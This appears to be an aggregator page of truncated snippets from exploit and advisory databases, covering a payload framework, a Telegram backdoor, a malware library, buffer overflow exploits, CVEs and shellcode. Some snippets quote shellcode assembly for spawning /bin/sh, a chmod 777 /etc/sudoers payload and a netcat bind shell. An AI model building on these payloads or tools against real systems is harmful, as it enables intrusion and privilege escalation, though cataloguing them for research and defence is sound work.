SharpShooter - Payload Generation Framework

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the...

Payload Generation Framework: SharpShooter

SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw’s DotNetToJavaScript tool to invoke methods from the...

openbuildservice Code Injection Vulnerability

openbuildservice is a general purpose system for distributing software. The system builds and distributes software packages in an automated, consistent and repeatable manner. A security vulnerability exists in the web ui in openbuildservice. An attacker can exploit this vulnerability to execute...

CVE-2011-3178

In the web ui of the openbuildservice before 2.3.0 a code injection of the project rebuildtimes statistics could be used by authorized attackers to execute shellcode...

Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)

Linux/x86-64 - Execute /bin/sh Shellcode 24 bytes. Shellcode exploit for Linuxx86-64 platform / global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...

Linux/x86 chmod 777 /etc/sudoers Shellcode (36 bytes)

/ Description ; Title : chmod 777 /etc/sudoers - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : chmod /etc/sudoers permissions ; OS : Linux ; Arch : x86 ; Size : 36 bytes chmod.nasm global start section .text start: ;...

Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow

Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Server 2008 R2 Socusoft's Photo 2 Video Converter v8.0.0 Free and...

Devil's Ivy vulnerability(CVE-2017-9765)

When we began a security analysis of remote configuration services last year, we had no idea it would lead us to uncover vulnerabilities that affect so many users. We have been studying the prevalence and nature of the vulnerabilities that arise in remote configuration services, so when we...

Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation

Note: Read our latest comprehensive report on ransomware: Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene. On May 12, there was a major outbreak of WannaCrypt ransomware. WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsa...

Immunity Canvas: IIS6_PROPFIND

Name| iis6propfind ---|--- CVE| CVE-2017-7269 Exploit Pack| CANVAS Description| IIS 6.0 PROPFIND ScStoragePathFromUrl Stack Buffer Overflow Notes| References: 'https://vulners.com/cve/CVE-2017-7269', 'https://github.com/edwardz246003/IISexploit' CVE Name: CVE-2017-7269 VENDOR: Microsoft...

EGESPLOIT - A Golang Library For Malware Development

EGESPLOIT is a golang library for malware development, it has few unique functions for meterpreter integration. DOCUMENTATION CalculateChecksumx : Function calculates x digit 8 bit checksum for reverse HTTP/HTTPS meterpreter connections, returns the calculated checksum as string...

Internet Bug Bounty: Adobe Flash Player PSDK Class Use After Free Vulnerability

I. Summary Adobe Flash Player is prone to a vulnerability which leads to Use After Free. Since the release condition is highly controllable, it is feasible to build a fully working exploit for shellcode execution with proper AS3 object occupied the original PSDK memory...

Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)

include include // Exploit Title: NetCat Bind Shell 64bit 64byte // Date: 6/28/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: v1.10-41 // email protected // OffSec ID: OS-20614 // Victim: netstat -an | grep LISTEN | grep tcp // Attacker: nc unsigned char code = \ define PORT...

Angler Exploit Kit Evading EMET

We recently encountered some exploits from Angler Exploit Kit EK that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit EMET. This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex...

Bt2 - Blaze Telegram Backdoor Toolkit

bt2 is a Python-based backdoor in form of a IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C. Dependencies Telepot requests Installation $ sudo pip install telepot $ sudo pip install requests PS:...

Internet Bug Bounty: Adobe Flash Player ASnative(101,10) Memory Corruption Vulnerability

I. Summary Adobe Flash Player is prone to a vulnerability which leads to Memory Corruption. ------------------------------------------------------------------ II. Description When ASnative101,10 is called with a MovieClip object pointer, Flash Player is crashed due to an invalid EIP value...

Linux x86 Download & Execute Shellcode

Linux x86 Download & Execute Shellcode. Shellcode exploit for linx86 platform / -------------------------------------------------------------------------------------------------------- + Author : B3mB4m Contact : [email protected] Project : https://github.com/b3mb4m/Shellsploit Greetz :...

PT-2016-7990

PInfo 0.6.9-5.1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized argument to the -m parameter. Attackers can craft a malicious input string with 564 bytes of padding followed by a return address to overwrite the...

VeryPDF Image2PDF Converter SEH Buffer Overflow

Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow Date: 10-7-2015 Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe Exploit Author: Robbie Corley Platform Tested: Windows 7 x64 Contact: [email protected] Website: CVE: Category: Local Exploit Description: The title paramet...

Heroes Of Might And Magic III .h3m Map File Buffer Overflow Exploit

This Metasploit module embeds an exploit into an uncompressed map file .h3m for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occurring when loading object sprite names leads to shellcode execution. This module requires Metasploit: http://metasploit.com/downloa...